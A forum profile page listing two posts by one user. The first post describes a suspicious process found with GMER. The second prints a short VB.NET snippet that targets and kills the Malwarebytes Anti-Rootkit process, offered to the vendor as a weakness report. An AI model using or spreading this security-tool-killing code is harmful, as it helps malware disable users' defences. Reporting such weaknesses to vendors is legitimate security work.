Jump to content

Hooligan3

Members
  • Posts

    2
  • Joined

  • Last visited

Reputation

0 Neutral

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Hi all, recently i ran a scan of MBR as i'm paranoid like that. The scan came back as "Unknown MBR". This made me curious, so i downloaded GMER and got to work trying to resolve this issue and get to the bottom of it. Here's when my worries began, i head over to the process tab and find a process with a strange chinese like name, i clicked on it and clicked "Kill process" and my windows blue screened with the error "Driver not less or equal too". I come from the malware background and know it is possible to create a BSOD protected process and maybe the symbol stops the process appearing in TaskMGR. Unicode or some exploit like that. I've ran the basic Farbar and MBAM Anti-rootkit etc and all came back clean. Any other suggestions or advice on what this process could be, i've attached an image of the process in GMER below. The process im talking about is PID 104 if you can't see it already.
  2. Mbam anti-rootkit has been targeted by malware coded within vb.net. Here's how malware can successfully disable MBAM anti-rootkit with around 10 lines of vb.net. This is simple stuff malwarebytes! Im disappointed! Here's the code: Try Dim s As Integer = 0 Dim ProcessPriorityClass As Integer = 29 Dim lpProcessName As String = "mbar" '<--- Mbar is the malwarebytes antirootkit For Each x As Process In Process.GetProcessesByName(lpProcessName) If NtSetInformationProcess(x.Handle, ProcessPriorityClass, s, Marshal.SizeOf(s)) = 0 Then x.Kill() 'Done. x.Refresh() Else x.Kill() x.Refresh() End If Next Catch For Each ax As Process In Process.GetProcessesByName("mbar") Try ax.Refresh() ax.Kill() ax.CloseMainWindow() Catch : End Try 'Most likely the ax.refresh killed of mbar so ax.kill failed with access denied! Next End Try This makes an error of unauthorised access on the mbar.exe (Im on the admin account) PS: Im not wanting any reply just want to make mbam better! Im not arrogant i promise!
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.